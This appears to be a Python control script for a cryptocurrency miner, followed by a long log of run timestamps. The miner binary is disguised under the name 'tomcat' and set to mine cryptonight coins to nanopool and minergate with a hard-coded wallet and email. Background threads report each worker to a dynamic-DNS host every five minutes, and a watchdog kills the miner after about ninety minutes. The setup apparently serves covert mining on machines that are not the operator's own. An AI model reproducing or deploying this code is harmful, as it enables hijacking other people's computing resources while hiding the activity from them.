import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:03.796781
#2018-02-17 16:10:07.277096
#2018-02-17 17:59:04.774744
#2018-02-17 19:47:06.721002
#2018-02-17 21:36:01.443574
#2018-02-17 23:20:10.002369
#2018-02-18 01:08:02.219216
#2018-02-18 02:56:06.518294
#2018-02-18 04:44:04.962583
#2018-02-18 06:34:06.823559
#2018-02-18 08:22:01.722243
#2018-02-18 10:11:01.315071
#2018-02-18 11:56:06.601064
#2018-02-18 13:41:03.905334
#2018-02-18 15:32:04.451694
#2018-02-18 17:20:09.051055
#2018-02-18 19:09:05.212178
#2018-02-18 20:55:07.226313
#2018-02-18 22:42:01.691169
#2018-02-19 00:31:01.507863
#2018-02-19 02:16:03.550565
#2018-02-19 04:04:01.462510
#2018-02-19 05:48:04.565100
#2018-02-19 07:37:03.862099
#2018-02-19 09:26:06.186324
#2018-02-19 11:15:08.726111
#2018-02-19 13:04:05.303816
#2018-02-19 14:52:01.650742
#2018-02-19 16:40:07.200347
#2018-02-19 18:27:09.630121
#2018-02-19 20:14:08.510510
#2018-02-19 22:03:01.864329
#2018-02-19 23:49:06.295138
#2018-02-20 01:35:03.192507
#2018-02-20 03:23:03.935457
#2018-02-20 05:10:06.070462
#2018-02-20 06:53:06.626856
#2018-02-20 08:39:05.621005
#2018-02-20 10:23:07.202868
#2018-02-20 12:09:01.532116
#2018-02-20 13:56:04.237067
#2018-02-20 15:39:07.000372
#2018-02-20 17:24:09.211522
#2018-02-20 19:12:09.185641
#2018-02-20 21:00:10.785919
#2018-02-20 22:45:05.542825
#2018-02-21 00:28:04.767189
#2018-02-21 02:14:01.777861
#2018-02-21 04:01:01.302888
#2018-02-21 05:47:06.287412
#2018-02-21 07:35:08.989821
#2018-02-21 09:20:06.942308
#2018-02-21 11:09:06.383966
#2018-02-21 12:57:06.552788
#2018-02-21 14:44:01.919655
#2018-02-21 16:31:11.800343
#2018-02-21 18:21:06.726352
#2018-02-21 20:06:01.711829
#2018-02-21 21:54:03.553597
#2018-02-21 23:41:01.816321
#2018-02-22 01:30:06.268986
#2018-02-22 03:18:05.457155
#2018-02-22 05:05:06.400071
#2018-02-22 06:48:03.858327
#2018-02-22 08:36:08.438534
#2018-02-22 10:23:08.098587
#2018-02-22 12:10:13.255413
#2018-02-22 13:57:02.014225
#2018-02-22 15:44:01.743853
#2018-02-22 17:29:08.405446
#2018-02-22 19:16:07.845243
#2018-02-22 21:09:03.594107
#2018-02-22 22:53:06.641153
#2018-02-23 00:40:01.973186
#2018-02-23 02:25:07.690444
#2018-02-23 04:15:03.809229
#2018-02-23 06:02:01.875908
#2018-02-23 07:47:06.603819
#2018-02-23 09:49:05.682963
#2018-02-23 11:54:06.670443
#2018-02-23 13:44:04.621082
#2018-02-23 15:32:02.066462
#2018-02-23 17:20:04.492281
#2018-02-23 19:03:08.702728
#2018-02-23 20:48:08.549926
#2018-02-23 22:33:07.380727
#2018-02-24 00:18:06.557362
#2018-02-24 02:11:01.756350
#2018-02-24 03:59:07.190850
#2018-02-24 05:46:06.842702
#2018-02-24 07:39:04.347754
#2018-02-24 09:24:01.540149
#2018-02-24 11:17:05.228813
#2018-02-24 13:06:07.336765
#2018-02-24 14:57:05.451921
#2018-02-24 16:47:05.755881
#2018-02-24 18:35:04.997811
#2018-02-24 20:24:04.906427
#2018-02-24 22:19:07.233797
#2018-02-25 01:28:01.398732
#2018-02-25 04:27:07.046681
#2018-02-25 07:59:03.703614